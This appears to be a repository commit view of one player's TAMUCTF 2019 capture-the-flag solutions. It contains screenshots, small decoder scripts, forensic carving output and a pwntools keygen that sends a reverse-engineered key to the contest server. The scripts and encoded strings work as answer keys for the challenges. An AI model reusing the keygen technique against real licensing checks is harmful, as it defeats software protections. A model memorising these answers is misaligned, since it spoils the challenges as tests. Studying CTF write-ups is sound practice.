TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png 查看文件

Before After
Width: 884  |  Height: 52  |  Size: 20 KiB

二進制
TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 57 KiB

二進制
TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 75 KiB

二進制
TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png 查看文件

Before After
Width: 877  |  Height: 50  |  Size: 20 KiB

+ 13
- 0
TAMUCTF/Crypto/Smile/decoder.py 查看文件

@ -0,0 +1,13 @@
from base64 import *
enc = "XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH"
flag = b64decode(enc)
key = ":)"
newflag = []
for i, l in enumerate(flag):
kunci = ord(key[i % len(key)])
cipher = ord(l)
newflag.append(chr(kunci ^ cipher))
newflag = ''.join(newflag)
print newflag

二進制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png 查看文件

Before After
Width: 1365  |  Height: 665  |  Size: 11 KiB

二進制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png 查看文件

Before After
Width: 969  |  Height: 612  |  Size: 62 KiB

二進制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png 查看文件

Before After
Width: 770  |  Height: 611  |  Size: 68 KiB

二進制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png 查看文件

Before After
Width: 879  |  Height: 31  |  Size: 16 KiB

+ 99
- 0
TAMUCTF/Misc/Hello_World/decoder.py 查看文件

@ -0,0 +1,99 @@
flag = '''push103
push 105
push 103
push 101
push 109
push 123
push 48
push 104
push 95
push 109
push 121
push 95
push 119
push 104
push 52
push 116
push 95
push 115
push 112
push 52
push 99
push 49
push 110
push 103
push 95
push 121
push 48
push 117
push 95
push 104
push 52
push 118
push 51
push 125
push 33
push 101
push 99
push 97
push 112
push 115
push 101
push 116
push 105
push 104
push 119
push 32
push 102
push 111
push 32
push 116
push 111
push 108
push 32
push 97
push 32
push 115
push 105
push 32
push 101
push 114
push 117
push 115
push 32
push 116
push 97
push 104
push 116
push 32
push 44
push 101
push 101
push 103
push 32
push 121
push 108
push 108
push 111
push 103
push 32
push 116
push 101
push 101
push 119
push 115
push 32
push 108
push 108
push 101
push 87
'''
newflag = ""
flag = flag.replace('push', '')
flag = flag.replace('\n', '')
flag = flag.split(" ")
flag = map(int, flag)
for i in flag:
newflag += chr(i)
print newflag

二進制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png 查看文件

Before After
Width: 879  |  Height: 49  |  Size: 21 KiB

二進制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png 查看文件

Before After
Width: 884  |  Height: 33  |  Size: 10 KiB

二進制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png 查看文件

Before After
Width: 882  |  Height: 216  |  Size: 65 KiB

二進制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 84 KiB

二進制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png 查看文件

Before After
Width: 882  |  Height: 47  |  Size: 16 KiB

二進制
TAMUCTF/Misc/I_heard_you_like_files/art.png 查看文件

Before After
Width: 1920  |  Height: 1080  |  Size: 3.4 MiB

+ 27
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt 查看文件

@ -0,0 +1,27 @@
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Sun Mar 3 15:59:09 2019
Invocation: foremost art.png
Output directory: /home/chao/Documents/CTF/TAMUCTF/Misc/I_heard_you_like_files/output
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: art.png
Start: Sun Mar 3 15:59:09 2019
Length: 3 MB (3518869 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00006700.zip 86 KB 3430685
1: 00000000.png 3 MB 0 (1920 x 1080)
2: 00006657.pdf 21 KB 3408641
Finish: Sun Mar 3 15:59:09 2019
3 FILES EXTRACTED
zip:= 1
png:= 1
pdf:= 1
------------------------------------------------------------------
Foremost finished at Sun Mar 3 15:59:09 2019

二進制
TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf 查看文件


二進制
TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png 查看文件

Before After
Width: 1920  |  Height: 1080  |  Size: 3.3 MiB

二進制
TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip 查看文件


+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml 查看文件

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="png" ContentType="image/png"/><Default Extension="jpeg" ContentType="image/jpeg"/><Override PartName="/_rels/.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/word/_rels/document.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/media/image1.png" ContentType="image/png"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/>
</Types>

+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels 查看文件

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>12</TotalTime><Application>LibreOffice/6.1.1.2$Linux_X86_64 LibreOffice_project/10$Build-2</Application><Pages>1</Pages><Words>4</Words><Characters>24</Characters><CharactersWithSpaces>27</CharactersWithSpaces><Paragraphs>1</Paragraphs></Properties>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dcterms:created xsi:type="dcterms:W3CDTF">2018-09-20T15:47:36Z</dcterms:created><dc:creator></dc:creator><dc:description></dc:description><dc:language>en-US</dc:language><cp:lastModifiedBy></cp:lastModifiedBy><dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-20T16:00:01Z</dcterms:modified><cp:revision>1</cp:revision><dc:subject></dc:subject><dc:title></dc:title></cp:coreProperties>

+ 1
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt 查看文件

@ -0,0 +1 @@
Sorry, no flag here

+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels 查看文件

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
</Relationships>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14 wp14"><w:body><w:p><w:pPr><w:pStyle w:val="TextBody"/><w:widowControl/><w:pBdr></w:pBdr><w:spacing w:before="0" w:after="225"/><w:ind w:left="0" w:right="0" w:hanging="0"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr><w:drawing><wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:align>center</wp:align></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>635</wp:posOffset></wp:positionV><wp:extent cx="2857500" cy="1600200"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapSquare wrapText="largest"/><wp:docPr id="1" name="Image1" descr=""></wp:docPr><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Image1" descr=""></pic:cNvPr><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId2"></a:blip><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2857500" cy="1600200"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:anchor></w:drawing></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Wait...now I am confused...</w:t></w:r></w:p><w:sectPr><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="1134" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection w:val="lrTb"/></w:sectPr></w:body></w:document>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:font w:name="Times New Roman"><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Symbol"><w:charset w:val="02"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Arial"><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Serif"><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Sans"><w:charset w:val="01"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="Open Sans"><w:altName w:val="Arial"/><w:charset w:val="01"/><w:family w:val="auto"/><w:pitch w:val="default"/></w:font></w:fonts>

二進制
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png 查看文件

Before After
Width: 300  |  Height: 168  |  Size: 83 KiB

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:zoom w:percent="100"/><w:defaultTabStop w:val="709"/></w:settings>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w14"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:rPrDefault><w:pPrDefault><w:pPr><w:widowControl/></w:pPr></w:pPrDefault></w:docDefaults><w:style w:type="paragraph" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:pPr><w:widowControl/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:color w:val="auto"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Heading"><w:name w:val="Heading"/><w:basedOn w:val="Normal"/><w:next w:val="TextBody"/><w:qFormat/><w:pPr><w:keepNext w:val="true"/><w:spacing w:before="240" w:after="120"/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="TextBody"><w:name w:val="Body Text"/><w:basedOn w:val="Normal"/><w:pPr><w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="List"><w:name w:val="List"/><w:basedOn w:val="TextBody"/><w:pPr></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Caption"><w:name w:val="Caption"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:spacing w:before="120" w:after="120"/></w:pPr><w:rPr><w:i/><w:iCs/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Index"><w:name w:val="Index"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/></w:pPr><w:rPr></w:rPr></w:style></w:styles>

+ 10
- 0
TAMUCTF/Reverse/KeyGenMe/.gdb_history 查看文件

@ -0,0 +1,10 @@
pdisas main
b *main+200
r
pdisas verify_key
b *verify_key+96
r
pdisas verify_key
b *verify_key+96
r
r

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png 查看文件

Before After
Width: 563  |  Height: 369  |  Size: 13 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png 查看文件

Before After
Width: 878  |  Height: 152  |  Size: 43 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png 查看文件

Before After
Width: 433  |  Height: 144  |  Size: 4.8 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png 查看文件

Before After
Width: 429  |  Height: 263  |  Size: 8.3 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 74 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png 查看文件

Before After
Width: 886  |  Height: 63  |  Size: 14 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 139 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 133 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png 查看文件

Before After
Width: 536  |  Height: 77  |  Size: 9.1 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 132 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 131 KiB

二進制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png 查看文件

Before After
Width: 879  |  Height: 77  |  Size: 17 KiB

+ 20
- 0
TAMUCTF/Reverse/KeyGenMe/bruteforce.py 查看文件

@ -0,0 +1,20 @@
from pwn import *
v5 = ""
v2 = ord('H')
flag = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
key = "[OIonU2_<__nK<KsK"
iterator = 0
while True:
for i in flag:
if(((ord(i) + 12) * v2 + 17) % 70 + 48) == ord(key[iterator]):
v5 += i
v2 = ord(key[iterator])
iterator += 1
break
if(len(v5) == len(key)):
break
v5 = v5[:-1]
print "Key: {}".format(v5)
r = remote("rev.tamuctf.com", 7223)
r.sendline(v5)
r.interactive()

二進制
TAMUCTF/Reverse/KeyGenMe/keygenme 查看文件


二進制
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153550.png 查看文件

Before After
Width: 649  |  Height: 591  |  Size: 79 KiB

二進制
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153910.png 查看文件

Before After
Width: 636  |  Height: 625  |  Size: 89 KiB

二進制
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_154148.png 查看文件

Before After
Width: 805  |  Height: 521  |  Size: 70 KiB

二進制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_202844.png 查看文件

Before After
Width: 1365  |  Height: 702  |  Size: 71 KiB

二進制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203307.png 查看文件

Before After
Width: 1363  |  Height: 336  |  Size: 77 KiB

二進制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203644.png 查看文件

Before After
Width: 1365  |  Height: 334  |  Size: 206 KiB

二進制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203910.png 查看文件

Before After
Width: 1366  |  Height: 274  |  Size: 136 KiB

二進制
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200611.png 查看文件

Before After
Width: 404  |  Height: 298  |  Size: 17 KiB

二進制
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200703.png 查看文件

Before After
Width: 397  |  Height: 311  |  Size: 18 KiB

二進制
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200832.png 查看文件

Before After
Width: 488  |  Height: 101  |  Size: 17 KiB

二進制
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201534.png 查看文件

Before After
Width: 1364  |  Height: 702  |  Size: 750 KiB

二進制
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201719.png 查看文件

Before After
Width: 565  |  Height: 181  |  Size: 23 KiB

二進制
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_202358.png 查看文件

Before After
Width: 901  |  Height: 168  |  Size: 34 KiB

Loading…
取消
儲存